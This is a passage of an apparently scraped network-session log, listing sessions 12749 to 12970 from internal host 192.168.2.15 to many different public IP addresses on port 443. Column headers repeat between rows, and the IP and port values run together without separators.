                                            12749192.168.2.1540278184.40.222.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12750192.168.2.1559904171.180.205.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12751192.168.2.1542578157.77.66.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12752192.168.2.1556806187.185.157.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12753192.168.2.1535360128.242.183.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12754192.168.2.1555652112.134.9.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12755192.168.2.1549374148.197.78.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12756192.168.2.1542196193.60.198.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12757192.168.2.1552492118.210.79.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12758192.168.2.1544126143.254.130.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12759192.168.2.1533394113.73.12.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12760192.168.2.1541468155.31.162.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12761192.168.2.1553068223.151.203.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12762192.168.2.153798068.22.200.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12763192.168.2.15335088.21.178.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12764192.168.2.1557462202.43.8.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12765192.168.2.1545592177.102.227.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12766192.168.2.1548062118.239.165.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12767192.168.2.1539578194.196.226.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12768192.168.2.1544704151.59.55.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12769192.168.2.1544184212.135.246.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12770192.168.2.154106054.241.92.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12771192.168.2.154536848.124.59.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12772192.168.2.155499464.186.77.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12773192.168.2.1549952101.132.96.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12774192.168.2.154686681.130.203.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12775192.168.2.1546556116.191.109.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12776192.168.2.1545636165.255.18.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12777192.168.2.153560693.225.21.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12778192.168.2.1546146156.253.241.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12779192.168.2.1553914137.183.50.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12780192.168.2.1556608101.228.179.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12781192.168.2.153861620.28.34.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12782192.168.2.155510439.79.151.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12783192.168.2.15415544.90.156.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12784192.168.2.1549006155.43.167.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12785192.168.2.1556772129.150.111.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12786192.168.2.154368652.144.94.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12787192.168.2.153902699.118.194.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12788192.168.2.1533382133.216.128.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12789192.168.2.15400184.5.40.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12790192.168.2.15608744.255.230.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12791192.168.2.153654086.201.126.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12792192.168.2.153301879.80.244.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12793192.168.2.1535064104.40.150.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12794192.168.2.1541814161.48.51.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12795192.168.2.154541662.216.158.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12796192.168.2.155010263.28.115.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12797192.168.2.154277696.201.69.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12798192.168.2.155940242.179.224.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12799192.168.2.153598499.145.220.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12800192.168.2.1549850207.162.152.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12801192.168.2.156018231.205.179.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12802192.168.2.1538634192.118.82.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12803192.168.2.1539300118.159.198.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12804192.168.2.153756219.63.89.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12805192.168.2.1537500153.120.177.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12806192.168.2.1545292222.84.100.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12807192.168.2.1556916126.167.100.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12808192.168.2.1558536200.162.239.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12809192.168.2.1558518132.146.112.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12810192.168.2.1553518131.111.84.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12811192.168.2.1543402204.186.72.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12812192.168.2.1558800128.42.28.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12813192.168.2.1536216191.91.67.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12814192.168.2.1552372154.231.230.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12815192.168.2.155891223.210.247.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12816192.168.2.1560760191.110.110.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12817192.168.2.153359431.82.81.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12818192.168.2.155611469.184.231.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12819192.168.2.154409654.45.244.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12820192.168.2.1558684186.109.69.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12821192.168.2.1551524156.32.39.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12822192.168.2.153399635.221.136.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12823192.168.2.1553878157.195.83.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12824192.168.2.1552882129.100.38.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12825192.168.2.1558960154.177.232.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12826192.168.2.155280872.88.168.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12827192.168.2.1556286103.15.43.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12828192.168.2.153973079.243.156.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12829192.168.2.154318627.195.252.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12830192.168.2.1548044196.55.70.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12831192.168.2.1554534184.120.92.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12832192.168.2.156059895.191.14.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12833192.168.2.1538092202.188.246.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12834192.168.2.1542056195.93.214.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12835192.168.2.1552306164.155.91.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12836192.168.2.1543996120.90.187.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12837192.168.2.1538814102.149.69.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12838192.168.2.155279231.251.131.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12839192.168.2.155188654.3.200.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12840192.168.2.1550224222.161.241.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12841192.168.2.1533364163.61.97.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12842192.168.2.154956818.163.47.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12843192.168.2.1546572184.99.182.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12844192.168.2.1545212177.209.49.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12845192.168.2.154269242.199.241.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12846192.168.2.1543194203.176.10.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12847192.168.2.153956443.134.95.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12848192.168.2.1535006128.145.122.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12849192.168.2.1546238157.152.218.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12850192.168.2.1552326165.22.187.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12851192.168.2.1559836113.172.100.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12852192.168.2.154464681.32.98.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12853192.168.2.153849447.4.150.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12854192.168.2.1556708166.165.234.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12855192.168.2.155500024.227.235.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12856192.168.2.154258839.194.56.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12857192.168.2.1559910135.150.191.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12858192.168.2.1555454142.246.152.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12859192.168.2.1555514174.144.167.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12860192.168.2.15521625.192.27.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12861192.168.2.1542114112.173.58.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12862192.168.2.155426891.173.61.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12863192.168.2.1558762180.22.213.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12864192.168.2.153730437.245.184.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12865192.168.2.1552490124.76.188.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12866192.168.2.1533520209.218.163.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12867192.168.2.1551112128.189.119.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12868192.168.2.155529290.251.47.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12869192.168.2.155125280.63.168.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12870192.168.2.1553058159.227.193.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12871192.168.2.1556808185.122.252.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12872192.168.2.1542290205.89.154.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12873192.168.2.1544852155.183.248.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12874192.168.2.1556602189.53.204.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12875192.168.2.155353449.234.152.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12876192.168.2.1556618166.71.23.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12877192.168.2.1550560138.173.110.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12878192.168.2.153329464.79.44.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12879192.168.2.1553026185.34.161.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12880192.168.2.1533688150.55.207.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12881192.168.2.1549196101.236.188.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12882192.168.2.1552010174.4.218.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12883192.168.2.154570882.140.174.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12884192.168.2.1553082135.58.186.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12885192.168.2.1547256183.95.192.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12886192.168.2.1548750183.241.138.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12887192.168.2.1552898122.203.22.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12888192.168.2.1534360112.211.196.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12889192.168.2.1545488149.85.73.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12890192.168.2.1537602181.51.42.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12891192.168.2.155293094.39.2.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12892192.168.2.1538380122.50.14.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12893192.168.2.1545330216.89.109.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12894192.168.2.1542874173.186.32.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12895192.168.2.155966253.92.255.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12896192.168.2.15400725.236.78.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12897192.168.2.154573892.220.128.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12898192.168.2.1560850177.109.133.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12899192.168.2.154690283.194.56.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12900192.168.2.1549922167.249.40.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12901192.168.2.1557108153.70.7.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12902192.168.2.1547734128.147.116.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12903192.168.2.155179832.69.179.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12904192.168.2.1552630200.207.9.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12905192.168.2.1560272103.98.203.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12906192.168.2.1559476112.173.23.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12907192.168.2.1544154114.227.173.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12908192.168.2.153681244.70.79.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12909192.168.2.1558854205.123.75.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12910192.168.2.1556516156.213.12.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12911192.168.2.1556254195.134.119.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12912192.168.2.1534978189.130.23.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12913192.168.2.1538340164.0.245.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12914192.168.2.1559070147.7.140.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12915192.168.2.1540900195.164.210.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12916192.168.2.1533300213.195.47.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12917192.168.2.1542746181.80.151.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12918192.168.2.1536428171.194.108.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12919192.168.2.1541954223.163.235.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12920192.168.2.1546598217.230.235.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12921192.168.2.1559744149.37.3.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12922192.168.2.154899049.100.124.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12923192.168.2.1542794178.78.198.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12924192.168.2.1560532150.69.6.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12925192.168.2.1533420168.113.45.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12926192.168.2.1559076213.141.126.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12927192.168.2.1552302196.199.232.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12928192.168.2.1554418195.124.240.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12929192.168.2.1535142218.86.18.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12930192.168.2.1554544191.41.84.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12931192.168.2.155859249.117.33.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12932192.168.2.1555526110.22.134.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12933192.168.2.153636877.105.123.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12934192.168.2.1543040167.66.216.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12935192.168.2.1550170172.100.167.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12936192.168.2.1539028126.151.65.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12937192.168.2.1553010117.75.95.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12938192.168.2.1551822110.111.70.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12939192.168.2.1541702114.205.130.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12940192.168.2.1535362118.198.180.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12941192.168.2.1535674200.192.79.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12942192.168.2.1534358157.204.127.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12943192.168.2.153850212.78.195.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12944192.168.2.1556048195.252.188.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12945192.168.2.154398498.69.203.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12946192.168.2.1543100149.34.129.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12947192.168.2.155077082.64.199.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12948192.168.2.153447266.238.196.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12949192.168.2.1534352222.96.167.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12950192.168.2.155827632.208.5.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12951192.168.2.154228032.1.53.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12952192.168.2.1555662149.62.8.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12953192.168.2.15463105.93.103.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12954192.168.2.1534302142.101.248.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12955192.168.2.153566884.230.123.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12956192.168.2.1550016140.15.139.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12957192.168.2.155033627.186.123.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12958192.168.2.153964276.214.223.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12959192.168.2.155693665.187.101.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12960192.168.2.1535118134.221.61.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12961192.168.2.153899064.163.11.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12962192.168.2.153655496.96.233.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12963192.168.2.1539944222.131.96.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12964192.168.2.1548406221.139.124.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12965192.168.2.1543822108.67.215.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12966192.168.2.1538104104.5.144.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12967192.168.2.1535794162.199.255.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12968192.168.2.156039220.155.164.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12969192.168.2.154149693.52.149.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12970192.168.2.1540858211.50.23.46443
                                            TimestampBytes transferredDirectionData


